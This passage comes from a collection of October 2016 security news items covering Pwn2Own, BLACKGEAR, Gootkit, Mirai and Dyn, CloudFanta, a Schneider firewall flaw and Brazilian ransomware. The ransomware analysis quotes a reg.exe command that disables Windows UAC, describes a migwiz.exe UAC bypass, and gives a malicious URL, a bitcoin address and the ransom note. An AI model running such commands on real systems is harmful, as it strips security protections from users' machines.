However, a from Keen Team indicated it was able to make the attack successfully work on iOS 10.1 as well.
The Keen Lab also managed to install a malicious app on the iPhone 6S, but the app did not survive a reboot due to a default configuration setting, which prevented persistence. Still, the ZDI awarded the hackers $60,000 for the vulnerabilities they used in the hack.
Hacking Google's Nexus 6P
For hacking the Nexus 6P, the Keen Lab Team used a combination of two vulnerabilities and other weaknesses in Android and managed to install a rogue application on the Google Nexus 6P phone without user interaction.
The ZDI awarded them a whopping $102,500 for the Nexus 6P hack.
So, of the total potential payout of $375,000 from the Trend Micro's Zero Day Initiative, the Keen Lab Team researchers took home $215,000.
Hackers behind the BLACKGEAR espionage campaign now targets Japan
27.10.2016 securityaffairs Cyber
The threat actor behind the Blackgear cyber-espionage campaign that is targeting Japanese entities is the same that hit Taiwan in 2012.
According to security experts from Trend Micro, Japanese organizations were targeted in an espionage campaign dubbed Blackgear.
Attackers behind the Blackgear appear to be the same that targeted users in Taiwan in 2012, they used a well-known strain of malware detected by many security firms as Elirks.
The attack vectors are spear phishing emails or compromised websites used to serve the malware in watering hole attack. The websites used in the watering hole attacks were used to download a malicious code that drops decoy documents and the downloaders used to fetch the backdoors used by the group (i.e. Elirks and Ymalr).
The researchers noticed that the both Elirks and Ymalr used as command and control (C&C) infrastructure blogging services in order to make harder their detection and , allowing the attackers to keep the location of the actual C&C server hidden and easily change the server that is in use.
“BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for taking using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts.” read the blog post published by TrendMicro.
“Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users. “
The researchers speculate the BLACKGEAR has evolved over time and threat actors behind the espionage campaign now moved to Japan. The decoy documents used in the attacks are now in Japanese and the blogging services used as part of the C&C infrastructure are based in Japan.
The experts from PaloAlto Network arrived at the same conclusion after they noticed some cyber attacks against organizations in Japan this summer that presented many similarities with attacks against targets in Taiwan.
Inside the Gootkit C&C server
27.10.2016 Kaspersky Virus
The Gootkit bot is one of those types of malicious program that rarely attracts much attention from researchers. The reason is its limited propagation and a lack of distinguishing features.
There are some early instances, including on Securelist (here and here), where Gootkit is mentioned in online malware research as a component in bots and Trojans. However, the first detailed analysis was published by researchers around two years ago. That was the first attempt to describe the bot as a standalone malicious program, where it was described as a “new multi-functional backdoor”. The authors of that piece of research put forward the assertion that the bot’s features were borrowed from other Trojans, and also provided a description of some of Gootkit’s key features.
In September 2016, we discovered a new version of Gootkit with a characteristic and instantly recognizable feature: an extra check of the environment variable ‘crackme’ in the downloader’s body. This feature was not present in the early versions. Just as interesting was the fact that we were able to gain access to the bot’s C&C server, including its complete hierarchal tree of folders and files and their contents.
Infection
As was the case earlier, the bot Gootkit is written in NodeJS, and is downloaded to a victim computer via a chain of downloaders. The main purpose of the bot also remained the same – to steal banking data. The new Gootkit version, detected in September, primarily targets clients of European banks, including those in Germany, France, Italy, the Netherlands, Poland, etc.
The Trojan’s main propagation methods are spam messages with malicious attachments and websites containing exploits on infected pages (Rig Exploit Kit). The attachment in the spam messages contained Trojan-Banker.Win32.Tuhkit, the small initial downloader that launched and downloaded the main downloader from the C&C server, which in turn downloaded Gootkit.
Examples of infected pages used to spread the Trojan
While carrying out our research we detected a huge number of the initial downloader versions that were used to distribute the Trojan – most of them are detected as Trojan.Win32.Yakes. Some of the loaders were extremely odd, like the one shown below. It clearly stated in its code that is was a loader for Gootkit.
Section of code from one of the initial downloaders
Some versions of Gootkit are also able to launch the main body with administrator privileges bypassing UAC. To do so, the main loader created an SDB file and registered it in the system with the help of the sdbinst.exe utility, after which it launched the bot with elevated privileges without notifying the user.
‘Crackme’ check
The new version of Gootkit is distinct in that it checks the environment variable ‘crackme’ located in the downloader body. It works as follows: the value of the variable is compared to a fixed value. If the two values differ, the bot starts to check if it has been launched in a virtual environment.
Checking the global variable in the downloader’s body
To do so, the bot checks the variable ‘trustedcomp’, just like it did in earlier versions.
Checking the bot’s body for launch in a virtual environment
The Trojan’s main body
The Trojan’s main file includes a NodeJS interpreter and scripts. After unpacking, the scripts look like this:
NodeJS scripts that make up the Trojan’s main body
The scripts shown in the screenshot constitute the main body of the Trojan. Gootkit has about a hundred various scripts, but they are mostly for practical purposes (intermediate data handlers, network communication DLLs, wrapper classes implementations, encoders etc.) and not of much interest.
The Trojan itself is distributed in an encrypted and packed form. Gootkit is encrypted with a simple XOR with a round key; unpacking is performed using standard Windows API tools. The screen below shows the first 255 bytes of the transferred data.
The Trojan’s packed body
The first three DWORDs denote the sizes of the received, unpacked and packed data respectively. One can easily check this by subtracting the third DWORD from the first DWORD, which leaves 12 bytes – i.e., the size of these variables.
Stealing money
Interception of user data is done the standard way, via web injections into HTTPS traffic (examples of these web injects are shown below). After the data is sent to the C&C server, it is processed by parsers, each of which is associated with the website of a specific bank.
Fragment of parser code
Communication with the C&C
In the version of Gootkit under review, the C&C address is the same as the address from which the Trojan’s main body is downloaded; in earlier versions, these two addresses sometimes differed. While generating a request, the Trojan uses its unique User Agent – any request that does not specify a User Agent will be denied.
The unique GootKit User Agent
Communication with the C&C comes down to the exchange of a pre-defined set of commands, the main ones being:
Request a list of files available to the Trojan (P_FS:FS_READDIR);
Receive those files (P_FS:FS_GETFILE/FS_GET_MULTIPLEFILES);
Receive update for the bot (P_FS: FS_GETFILE);
Obtain screenshot (P_SPYWARE:SP_SCREENSHOT);
Upload list of processes (P_SPYWARE:SP_PROCESSLIST);
Terminate process (P_SPYWARE:SP_PROCESSKILL);
Download modules (P_FS: FS_GETFILE);
Receive web injects (P_ SPYWARE:SP_SPYWARE_CONFIG).
The bot’s main commands and sub-commands
The C&C addresses (two or three in number) are hardwired in the loader’s body and can also be saved in the registry. The body of the data packet may vary depending on the request type, but always includes the following variables:
Size of data packet, plus eight;
Check value XORed with a constant;
Command type;
Command sub-type.
In the screen below, the C&C requests registration information from the bot during its first launch.
Request from C&C, example of variables
The response in this case will contain detailed information about the infected computer, including:
Network adapter parameters;
CPU details, amount of RAM;
User name, computer name.
Regardless of the request type, data is communicated between the C&C and the bot in the format protobuf.
When the main body is downloaded, the address that the loader contacts typically ends in one of the following strings:
/rbody32;
/rbody64;
/rbody320.
Mystery solved…rather easily
We found a configuration error that often appears on botnet C&C servers and took advantage of it to capture a complete tree of folders and files, as well as their contents, from one of the GootKit C&C servers.
Contents of GootKit C&C server
The C&C server contains a number of parsers for different banking sites. These parsers are used (provided the user data is available) to steal money from user accounts and to send notifications via Jabber. The stolen data is used in the form of text files, with the infected computer’s IP address used as the file name.
Stolen data and logs on the bot’s C&C server
Example of stolen data in one of the text files
Other data (bank transfers and logs) is also stored in text file format.
Parser logs
An analysis of the bot’s web injects and parser logs has shown that the attackers primarily target the clients of German and French banks.
Distribution of web injects across domain zones
Excerpts from parser logs
Analysis of the server content and the parsers made it clear that the botnet’s creator was a Russian speaker. Note the comments in the screen below.
A fragment of script including the author’s comments in Russian
Moreover, Gootkit most probably has just one owner – it’s not for sale anywhere and, regardless of the downloaders’ modifications or type of admin panel, the code in NodeJS (the Trojan’s main body) is always the same.
Examples of Gootkit web injects
Conclusions
Gootkit belongs to a class of Trojans that are extremely tenacious, albeit not very widespread. Because it’s not very common, new versions of the Trojan may remain under the researchers’ radar for long periods.
It should also be noted that the users of NodeJS as a development platform set themselves certain limitations, but simultaneously get a substantial degree of flexibility and simplicity when creating new versions of the Trojan.
Kaspersky Lab’s security products detect the Trojan GootKit and all its associated components under the following verdicts:
Trojan-Banker.Win32.Tuhkit (the initial downloader distributed via emails);
Trojan.Win32.Yakes (some modifications of the main downloader);
HEUR:Trojan.Win32.Generic (the bot’s main body, some modifications of the downloader).
MD5
1c89a85c1a268f6abb34fb857f5b1b6f
7521e82162ed175ad68582dd233ab1ae
9339dcb3571dda122b71fb80de55d0d6
b13378ad831a1e4e60536b6a3d155c42
9ba9f48cda9db950feb4fbe10f61353c
Lidé podceňují bezpečnost domácích routerů. Mohou je ovládnout kyberzločinci
27.10.2016 Novinky/Bezpečnost Zabezpečení
Na alarmující situaci na poli domácích routerů poukazuje čerstvý průzkum antivirové společnosti Eset. Podle něj totiž lidé velmi podceňují zabezpečení těchto bran do světa internetu. Z každých sedmi testovaných routerů se podařilo napadnout alespoň jeden. To velmi nahrává kyberzločincům, kteří mohou tyto síťové prvky ovládnout na dálku.
„Test se zaměřil na kontrolu výchozích uživatelských jmen a hesel a jejich nejčastěji používaných kombinací. Je znepokojující, že v jednom případě ze sedmi byl útok úspěšný,” řekl Peter Stančík, Security Evangelist společnosti Eset.
Ten zároveň upozornil na to, jakého hlavního neduhu se lidé při konfiguraci síťových prvků dopouštějí.
„Zejména nezabezpečené služby, jako je Telnet, by rozhodně neměly být otevřené, a to ani do interních sítí, což bylo bohužel zjištěno ve 20 procentech případů,“ dodal Stančík.
Slabá hesla, nevhodné nastavení
Průzkum dále ukázal, že 15 procent uživatelů používá slabá hesla, nejčastěji v kombinaci s přednastaveným uživatelským jménem „admin“. Přibližně 7 % testovaných zařízení navíc obsahovalo zranitelnost, kterou bezpečnostní experti označili jako středně nebo vysoce vážnou. Skenování portů odhalilo, že síťové služby jsou velmi často přístupné nejen z vnitřních, ale i z externích sítí.
Více než polovina dalších zranitelností vycházela z nevhodně nastavených přístupových práv. Na pozoru by se měli mít lidé podle průzkumu, do kterého bylo zařazeno na 12 000 routerů, také před zneužitím příkazů tzv. metodou command injection.
„Ta cílí na spouštění libovolných příkazů ve vzdáleném operačním systému skrze zranitelnosti v aplikacích, které nemají dostatečně ošetřeno ověření vstupů. Bezmála 10 % softwarových zranitelností se týkalo takzvaného cross-site scriptingu (XSS), který umožňuje útočníkovi měnit konfiguraci routeru tak, aby mohl spouštět škodlivé skripty na straně klienta,“ uvádí bezpečnostní expert.
Co se stane, když se útočníkům podaří do routeru dostat? Nejčastěji se snaží přesměrovat internetový provoz. Místo serverů, jako jsou například Seznam nebo Google, se poškozeným zobrazí například hláška o nutnosti instalace flash playeru. Místo té se ale do PC stáhne další virus. Útočníci tak rázem mají přístup nejen k routeru, ale i k připojenému počítači.
Počet útoků stoupá
Na brány do světa internetu se zaměřují kyberzločinci stále častěji. Využívají toho, že zabezpečení těchto internetových zařízení uživatelé především v domácnostech velmi podceňují, někdy to ale platí i o firmách. Březnová studie Cisco Annual Security Report ukázala, že devět z deseti internetových zařízení má slabá místa.
Hlavní problém je podle bezpečnostních expertů v tom, že routery není možné chránit antivirovými programy, jako je tomu u počítačů. I tak ale nejsou uživatelé úplně bezbranní. Řešením je stahování vždy nejnovějších aktualizací a bezpečnostních záplat, stejně jako vhodná konfigurace každého síťového prvku.
Do konfigurace routerů by se nicméně neměli pouštět méně zkušení uživatelé. Mohou totiž nevhodným nastavením způsobit více škody než užitku. Paradoxně tak mohou klidně otevřít zadní vrátka pro útočníky.
Friday's Massive DDoS Attack Came from Just 100,000 Hacked IoT Devices
27.10.2016 thehackernews Attack
Friday's DDoS Attack Came from Just 100,000 Infected IoT Devices
Guess how many devices participated in last Friday's massive DDoS attack against DNS provider Dyn that caused vast internet outage?
Just 100,000 devices.
I did not miss any zeros.
Dyn disclosed on Wednesday that a botnet of an estimated 100,000 internet-connected devices was hijacked to flood its systems with unwanted requests and close down the Internet for millions of users.
Dyn executive vice president Scott Hilton has issued a statement, saying all compromised devices have been infected with a notorious Mirai malware that has the ability to take over cameras, DVRs, and routers.
"We're still working on analyzing the data but the estimate at the time of this report is up to 100,000 malicious endpoints," Hilton said. "We are able to confirm that a significant volume of attack traffic originated from Mirai-based botnets."
Mirai malware scans for Internet of Things (IoT) devices that are still using their default passwords and then enslaves those devices into a botnet, which is then used to launch DDoS attacks.
A day after the attack, Dyn confirmed that a botnet of Mirai malware-infected devices had participated in its Friday's Distributed Denial of Service attacks.
However, after an initial analysis of the junk traffic, just yesterday, the company revealed that it had identified an estimated 100,000 sources of malicious DDoS traffic, all originating from IoT devices compromised by the Mirai malware.
Earlier the company believed that approximately "tens of millions" of IP addresses were responsible for the massive attack against its crucial systems, but the actual number came out to be much much less, leaving all of us wondering, as:
How did the Attack Succeed to this Massive Level?
To this, Hilton said that Domain Name System protocol itself has the ability to amplify requests from legitimate sources.
"For example, the impact of the attack generated a storm of legitimate retry activity as recursive servers attempted to refresh their caches, creating 10-20X normal traffic volume across a large number of IP addresses," Hilton said. "When DNS traffic congestion occurs, legitimate retries can further contribute to traffic volume."
"It appears the malicious attacks were sourced from at least one botnet, with the retry storm providing a false indicator of a significantly larger set of endpoints than we now know it to be."
Friday's cyber attack overwhelmed Dyn's central role in routing and managing Internet traffic, rendering hundreds of sites and services, including Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and AirBnb, inaccessible to Millions of people worldwide for several hours.
Dyn did not disclose the actual size of the attack, but it has been speculated that the DDoS attack could be much bigger than the one that hit French Internet service and hosting provider OVH that peaked at 1.1 Tbps, which is the largest DDoS attack known to date.
According to the company, this attack has opened up an important debate about Internet security and volatility.
"Not only has it highlighted vulnerabilities in the security of 'Internet of Things' (IOT) devices that need to be addressed, but it has also sparked further dialogue in the Internet infrastructure community about the future of the Internet," Hilton said.
Next DDoS Attack could reach Tens Of Terabits-Per-Second
If the IoT security is not taken seriously, the future DDoS attack could reach tens of terabits-per-second, as estimated by network security firm Corero.
The DDoS threat landscape is skyrocketing and could reach tens of terabits-per-second in size, following a discovery of a new zero-day attack vector that has the ability to amplify DDoS attacks by as much as 55x, Corero warned in a blog post published Tuesday.
According to the security firm, this new attack vector uses the Lightweight Directory Access Protocol (LDAP), which if combined with an IoT botnet, could break records in DDoS power.
Dave Larson of Corero explains:
"LDAP is not the first, and will not be the last, protocol or service to be exploited in this fashion. Novel amplification attacks like this occur because there are so many open services on the Internet that will respond to spoofed record queries. However, a lot of these attacks could be eased by proper service provider hygiene, by correctly identifying spoofed IP addresses before these requests are admitted to the network."
You can read more on Corero's official website.
How to Protect your Smart Device from being Hacked
1. Change Default Passwords of your connected devices: If you have got any internet-connected device at home or work, change your credentials if it still uses default ones. Keep in mind; Mirai malware scans for default settings.
2. Disable Universal Plug-and-Play (UPnP): UPnP comes enabled by default in every IoT device, which creates a hole in your router's security, allowing malware to infiltrate any part of your local network.
Check for "Universal Plug and Play" features and turn them OFF.
3. Disable Remote Management through Telnet: Go into your router’s settings and disable remote management protocol, specifically through Telnet, as this is a protocol used for allowing one computer to control another from a remote location. It has also been used in previous Mirai attacks.
4. Check for Software Updates and Patches: last but not the least, always keep your connected devices and routers up-to-date with the latest vendor firmware.
Check if your IoT device is vulnerable to Mirai malware
internet-of-things-scanner
There is an online tool called Bullguard's IoT Scanner that can help you check if any IoT device over your network is vulnerable to Mirai malware.
If it detects any, contact the device's manufacturer or lookout for a solution to patch those vulnerable gaps.
The tool makes use of the vulnerability scanning service Shodan for finding unprotected computers and webcams on your home network that are exposed to the public and potentially accessible to hackers.
LinkedIn to get Banned in Russia for not Complying with Data Localization Law
27.10.2016 thehackernews Social
The world's largest online professional network LinkedIn could face a ban in Russia after the company has failed to comply with a Russian data localization law that compels companies to keep data on Russian users in their country.
If you are not aware, LinkedIn is the only major social network which is not banned in China, because the company agreed to cooperate with the Chinese government and remove controversial content.
However, LinkedIn could be the first social network in Russia to be blocked by the Russian state's federal media regulator, called Roskomnadzor, for not complying with the rules.
In July 2014, the Russia approved amendments to the Russian Personal Data Law which came into force in 1st September 2015, under which foreign tech companies were required to store the personal data of its citizens within the country.
However, Russia was not the first country to enforce such law on foreign tech companies. A few months ago, Iran also imposed new regulations on all foreign messaging and social media apps to move 'data and activity' associated with Iranian citizens onto servers in Iran within one year.
The law was in an attempt to protect its citizen's data from the NSA's mass surveillance revealed by whistleblower Edward Snowden.
Big technology companies, such as Google, Apple, and Viber, have reportedly already moved some of their servers to Russia this year.
However, companies like Facebook, Microsoft, Twitter denied complying with the law. But, the Russian Internet watchdog Roskomnadzor has targeted LinkedIn in its first attempt to pressurize foreign companies to comply with its new privacy law.
Roskomnadzor has chosen LinkedIn its first target due to the company's history of security problems. The massive 2012 hack in LinkedIn exposed over 117 Million passwords and usernames.
"They have a bad track record: Every year there’s a major scandal about the safety of user data," Roskomnadzor spokesman Vadim Ampelonskiy told the Moscow Times.
Roskomnadzor said not even LinkedIn refused to move its servers to Russia, but the company also collects and sends data about its citizen who are not even users of the social network without their consent.
"We are seeking a court order to block LinkedIn. We twice sent requests in the summer, but they did not provide answers to our questions," Ampelonskiy told the TASS news agency.
Moscow’s Tagansky District Court has also ruled in favor of the Roskomnadzor, though LinkedIn has appealed to a higher court for removing the ban. The Moscow City Court will announce the decision on November 10.
The watchdog says they will remove the ban if the social networking company provides information that it has comply with the law and moved its servers with data about Russians to their country.
Roskomnadzor – also known as the Federal Service for Supervision in the Sphere of Telecom, Information Technologies, and Mass Communications – is Russia's telecoms watchdog that runs a huge blacklist of websites banned in Russia.
Massive DDoS attacks caused broadband outages to StarHub customers
27.10.2016 securityaffairs Attack
Massive DDoS attacks caused broadband outages to StarHub customers,it is the first time that Singapore has experienced such an attack on its infrastructure.
StarHub in Singapore is the latest victim of a massive DDoS attacks powered with compromised IoT devices against its DNS infrastructure.
It seems that hackers used kit owned by its customers, the company mitigated the attacks by filtering the malicious traffic and increasing the DNS capacity.
“StarHub Confirms Cause of Home Broadband Incidents on 22 October and 24 October 2016
Singapore, 25 October 2016 – We have completed inspecting and analyzing network logs from the home broadband incidents on 22 October and 24 October and we are now able to confirm that we had experienced intentional and likely malicious distributed denial-of-service (DDoS) attacks on our Domain Name Servers (DNS). These caused temporary web connection issue for some of our home broadband customers.” reads a message published on Facebook by the company.
“On both occasions, we mitigated the attacks by filtering unwanted traffic and increasing our DNS capacity and restored service within two hours.”
The DNS server of the company was hit by a huge volume of traffic that knocked some home broadband customers offline.
The company has no doubts about the malicious nature of the DDoS attack that reached a magnitude and a level of sophistication never experienced before by StarHub.
“These two recent attacks that we experienced were unprecedented in scale, nature and complexity. We would like to thank our customers for their patience as we took time to fully understand these unique situations and to mitigate them effectively”, reads StarHub.
In the message shared by the company there is no explicit reference to the Mirai botnet, but representatives of StarHub told Straits Times speculated the attack was powered by customers’ infected webcams and routers.
The company is inviting its customers to use only IoT from reputable vendors and it is inviting to adopt a proper security posture when dealing with connected objects. The company already started a campaign to sanitize the kit used by its customers.
Singapore’s Cyber Security Agency and the Infocomm Media Development Authority issued a notice to all Internet service providers and telco companies to improve the level of cyber security following two cyber attacks on StarHub.
“This is the first time that Singapore has experienced such an attack on its telco infrastructure,” reads the joint notice.
“Given the increasing connectedness of digital systems, there is no fool-proof solution. It takes a collective effort from companies and society to bolster our cyber resilience,” according to a joint statement late Wednesday.
CVE-2016-7855 flaw in Adobe Flash Player exploited in targeted attacks
27.10.2016 securityaffairs Vulnerebility
Adobe has issued a security patch for its Flash Player that fixes a critical vulnerability, tracked as CVE-2016-7855, used in targeted attacks.
Adobe has released a security update for its Flash Player that address a critical vulnerability, tracked as CVE-2016-7855, that has been exploiting in the wild by threat actors.
According to the security advisory issued by Adobe, the CVE-2016-7855 has been exploiting in targeted attacks. The vulnerability is a use-after-free issue that can be triggered by attackers for arbitrary code execution.
“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address a critical vulnerability that could potentially allow an attacker to take control of the affected system.” states the summary published by Adobe.
“Adobe is aware of a report that an exploit for CVE-2016-7855 exists in the wild, and is being used in limited, targeted attacks against users running Windows versions 7, 8.1 and 10.”
The CVE-2016-7855 flaw affects Windows, Macintosh, Linux and Chrome OS, Flash Player 23.0.0.185 and earlier, and 11.2.202.637 and earlier for Linux.
The vulnerability was discovered by the researchers Neel Mehta and Billy Leonard from the Google Threat Analysis Group.
The researchers confirmed the exploitation of the CVE-2016-7855 vulnerability in a few, targeted attacks against users running Windows 7, 8.1 and 10.
The security researchers at Adobe speculate the involvement of a sophisticated threat actor behind the targeted attacks that exploited the issue.
Adobe issued the Flash Player 23.0.0.205 and 11.2.202.643 (Linux).
Both Microsoft and Google are also expected to address the vulnerability by issuing updates for Chrome, Edge, and Internet Explorer 11.
Adobe software continues to be a privileged target of hackers, zero-day and security vulnerabilities affecting the products of the company have been exploited in numerous attacks in the wild.
CloudFanta Malware Steals Banking Information Via Cloud Storage Apps
27.10.2016 securityaffairs Virus
Watch out, threat research labs Netskope spotted the CloudFanta Malware Stealing Banking Information Via Cloud Storage Apps.
Threat Research Labs, Netskope, published a detailed research on the malware “CloudFanta” campaign, suspect since July 2016 to steal more than 26,000 worth of email credentials. CloudFanta benefits from the ‘SugarSync’ – a cloud storage app – to distribute itself and steal user credentials and monitor online banking activities to extract sensitive information.
CloudFanta attacks its victims through an attachment link in a spearfishing email. It lures the victim to click on the provided link or execute a file. According to the experts at Netskope, the SugarSync spread the malware with a URL “https://www[.]sugarsync[.]com/pf/D3202366_07280196_66523?directDownload=true.”
The downloaded zip archive “NF-9944132-br.zip” contained a downloader JAR file “NF-9944132-br.PDF.jar” with the dual extension “.PDF.jar.” The files retrieved by this downloader JAR are detected by Netskope Threat Protection as “Backdoor.Generckd.3549404,
Backdoor.Generckd.3540808,
Backdoor.Generckd.18673650,
Backdoor.Generckd.3542220
and Gen:Variant.Symm.60013.”
Above research explained by Netskope, suggests that users are primarily targeted by a link in a spearphishing email, which lures and leads them to download a zip file which contains a dual extension “.PDF.JAR” to fool the victim. When he opens the JAR file, it silently downloads DLL (Dynamic Linked Library) files in the background (C:\users\public).
The CloudFanta malware goes undetected by network security devices such as firewalls, and intrusion detection systems because it downloads DLL files under the hoax extension “.PNG” and uses SSL/HTTPS communication. These DLL files are then renamed with the hostname and extension “.TWERK”
The director of engineering and cloud security research of Netskope, Ravi Balupari explains that “This malware campaign looks for the users’ email addresses and passwords,” he says, “It’s also targeting specific users.” As the primary target of CloudFanta is currently Brazil.
How does this malware work? When victims enter their login credentials on an infected machine, their sign-in page redirects to a phishing sign-in page so that their credentials can be stolen. When they enter their credentials the data is uploaded to the C&C server, and then they are redirected back to the original sign-in page. Balupari explains, the malware also bypasses security measures of virtual keyboards, as most banks use sign-in through virtual keyboards.
When victims try to access their accounts, the malware takes a snapshot of every single click. It then saves a text file containing mouse clicks, which helps attackers to view victim’s passwords later.
SugarSync isn’t the only software application affected by CloudFanta; the malware also abused DropBox to host malicious files. The ability to automatically download files and SugarSync’s broad user base made it easier for the malware to spread itself.
Traditional malware used other servers to host attacker’s files, on the other hand with the cloud, it is convenient for them to have broader access and spread cloud-based malware quickly and access everywhere.
Balupari explains, “Typically, cloud-based apps provide a convenient method for downloading files.”
Netskope has joined hands with Sugarsync to stop the malware from spreading by taking down infected URLs. The collaboration is to provide information on malicious links and monitor CloudFanta changes in other malware campaigns.
Balupari said, “We’ll definitely see a rise in cloud malware campaigns going forward,” he further said, “Enterprises and customers who have been adopting cloud apps need to add additional layers of security.”
There are various steps businesses and individuals can take to prevent cloud-malware from infecting their sensitive information, for example, policy to block executable files with type “image/png,” end-to-end encryption software, enable “view known file extension” in windows explorer, two-factor authentication, Virtual Private Network (VPN) software, updated antivirus, and keep system updated.
IT pros should also make a practice to keep tracks and detect unauthorized cloud services and ensure policies regarding prevention of data loss, managing data entry, and back-up of sensitive data stored in the cloud.
Experts disclosed a critical flaw in Schneider Industrial Firewalls
27.10.2016 securityaffairs Vulnerebility
CyberX experts at the SecurityWeek’s 2016 ICS Cyber Security Conference disclosed a critical flaw in the Schneider Industrial Firewalls.
This week, at the SecurityWeek’s 2016 ICS Cyber Security Conference, researchers at industrial security firm CyberX disclosed several important vulnerabilities.
The experts demonstrated how hackers can target ICS systems and passing security measures in places.
Among the vulnerabilities disclosed by the experts, there is a flaw affecting a Schneider Electric industrial firewall that could be exploited by hackers for remote code execution.
The vulnerability affects products of the Schneider Electric’s ConneXium TCSEFEC family of industrial ethernet firewalls. This family of products is used in the industrial contexts for the protection of SCADA systems, automation systems, industrial networks and other systems.
The experts discovered that the web-based administration interface of the Schneider Electric’s ConneXium TCSEFEC firewalls is affected by a buffer overflow. The exploitation of the flaw could allow attackers to execute arbitrary code.
The researchers also reported the flaw to the US ICS-CERT that is to issue a security advisory.
A threat actor could exploit the flaw to change firewall rules, eavesdrop on traffic, inject malicious traffic, and disrupt communications.
The researchers highlighted that the flaw is exploitable also by attackers that haven’t specific technical skills.
“Exploitation of this security hole could also lead to manipulation of control systems, which, in a worst case scenario, could result in physical damage. Programmable logic controllers (PLCs) typically don’t have any type of authentication, allowing attackers to easily gain access and exploit known or zero-day flaws.” reported Eduard Kovacs from Security Week.
Unfortunately, it is quite easy for attackers to target Schneider industrial firewalls that are easy to find thanks to search engines such as Shodan or Censys.
According to CyberX, the vendor Schneider Electric has already developed a security update to address the vulnerability, but it has yet released it.
The researchers from CyberX also reported seven zero-day flaws in PLC systems from a major unnamed vendor that is already working on a security update to fix them.
The “notification” ransomware lands in Brazil
26.10.2016 Kaspersky Virus
It’s unusual for a day to go by without finding some new variant of a known ransomware, or, what is even more interesting, a completely new one. Unlike the previously reported and now decrypted Xpan ransomware, this same-but-different threat from Brazil has recently been spotted in the wild. This time the infection vector is not a targeted remote desktop intrusion, but a more massively propagated malicious campaign relying on traditional spam email.
Since the infection is not done manually by the bad guys, their malware has a higher chance of being detected and we believe that is one of the reasons for them to have added one more level of protection to the code, resorting to a binary dropper to launch the malicious payload.
Given that this particular ransomware is fairly well known by now, instead of opting for the usual branding and marketing efforts in which most ransomware authors invest time, this group has decided to choose an unnamed campaign, showing only an email address for technical support and a bitcoin address for making the payment. It has become a kind of urban legend that if you can’t find something on Google, then it doesn’t exist.
Not very long ago, we saw the birth of truly autochthonous Brazilian ransomware, without much technical sophistication and mainly based on an open-source project. While there’s a long road ahead for local bad guys to achieve the level of the key players on the ransomware scene, this particular family is interesting to study since there have been versions in English, Italian, and now Brazilian Portuguese. Is this ransomware being sold as a commodity in underground forums with Brazilian crews just standing on the shoulders of giants? Or is this a regional operation just starting out?
As one of the very few ransomware variants that prepend a custom ‘Lock.’ extension to the encrypted files instead of appending it, the task of recognizing this malware is not particularly difficult. However, understanding its true origins could still be considered an ongoing debate.
The drop
If we trust that the first transaction corresponds to the very first victim, the campaign has probably been active since 2016-04-04 17:29:26 (April 4th, 2016). In reality, this is not exactly accurate. The timestamp of the original dropper shows that the sample was actually compiled at the beginning of October:
That would mean that the criminal behind the campaign might have had different ransomware campaigns running in the past, or is just using the same BTC wallet for more than his criminal deeds.
The dropper is protected by the popular .NET obfuscator SmartAssembly, as can be seen by the string “Powered by SmartAssembly 6.9.0.114”. Once executed, it tries to mask itself in the Alternate Data Stream of the NTFS file system in Windows:
“%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Sims.exe:Zone.Identifier
It’s capable of disabling Windows LUA protection:
“HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM”; Key: “ENABLELUA”; Value: “00000000”
(cmd.exe /c %WINDIR%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f)
The mechanism used to write new information to the registry is quite unusual: it uses the official windows application ‘migwiz.exe’ in order to bypass the UAC screen, not requiring any action from the user to execute with elevated privileges.
The malware is able to do that by writing a library ‘cryptbase.dll’ to the same folder as the ‘migwiz.exe’ file. Then, as soon as it’s launched, the process will load this library, which has a WinExec call that will launch the command line provided by the parameter.
The reason why they are using MigWiz is because this process is one that is in Microsoft’s auto-elevate list, meaning it can be elevated without asking for explicit permission.
As a simple mean of information gathering, the dropper will read the name of the infected computer:
HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME”; Key: “COMPUTERNAME
Moreover, it includes data stealer techniques, such as retrieving information from the clipboard, or while it’s being typed on the keyboard. Additionally it has the capability to reboot the user’s machine.
@4333be: push ebp
@4333bf: mov ebp, esp
@4333c1: sub esp, 14h
@4333c4: push ebx
@4333c5: mov ebx, dword ptr [ebp+08h]@4333c8: lea eax, dword ptr [ebp-04h]@4333cb: push eax
@4333cc: push 00000028h
@4333ce: call dword ptr [00482310h] ;GetCurrentProcess@KERNEL32.DLL
@4333d4: push eax
@4333d5: call dword ptr [0048202Ch] ;OpenProcessToken@ADVAPI32.DLL
@4333db: test eax, eax
@4333dd: je 0043341Eh
@4333df: lea ecx, dword ptr [ebp-10h]@4333e2: push ecx
@4333e3: push 00487D68h ;SeShutdownPrivilege
Finally, it drops and executes the file tmp.exe (corresponding hash B4FDC93E0C089F6B885FFC13024E4B9).
Hello sir, hello madam, your fines have been locked
After the infection has been completed, as is usual in all ransomware families, the ransom note is shown. This time, it is written in Brazilian Portuguese and demanding 2000 BRL, which equates to around 627 USD or 1 BTC at the time of writing.
The bitcoin address provided (1LaHiL3vTGdbXnzyQ9omsYt8nFkUafXzK4) for payment shows total deposits for 1.89 BTC although many transactions have been made since the creation of this wallet. This is leading us to believe that either the criminal has been using the wallet for other purposes or they have bargaining with the victims and offering them a lower price, as depicted by the amount in each transaction.
The ransom note is very succinct, without giving any special payment URL or any other type of information. The victim will have to learn about bitcoin payments the hard way, and should they need support they can reach the criminals through a single email point of contact.
AVISO
Ola Sr(a),
TODOS os seus arquivos foram BLOQUEADOS e esse bloqueio somente serão DESBLOQUEADOS
caso pague um valor em R$ 2000,00 (dois Mil reais) em Bitcoins
Após o pagamento desse valor, basta me enviar um print para o email
infomacaoh@gmail.com
que estarei lhe enviando o programa com a senha para descriptografar/desbloquear o seus arquivos.
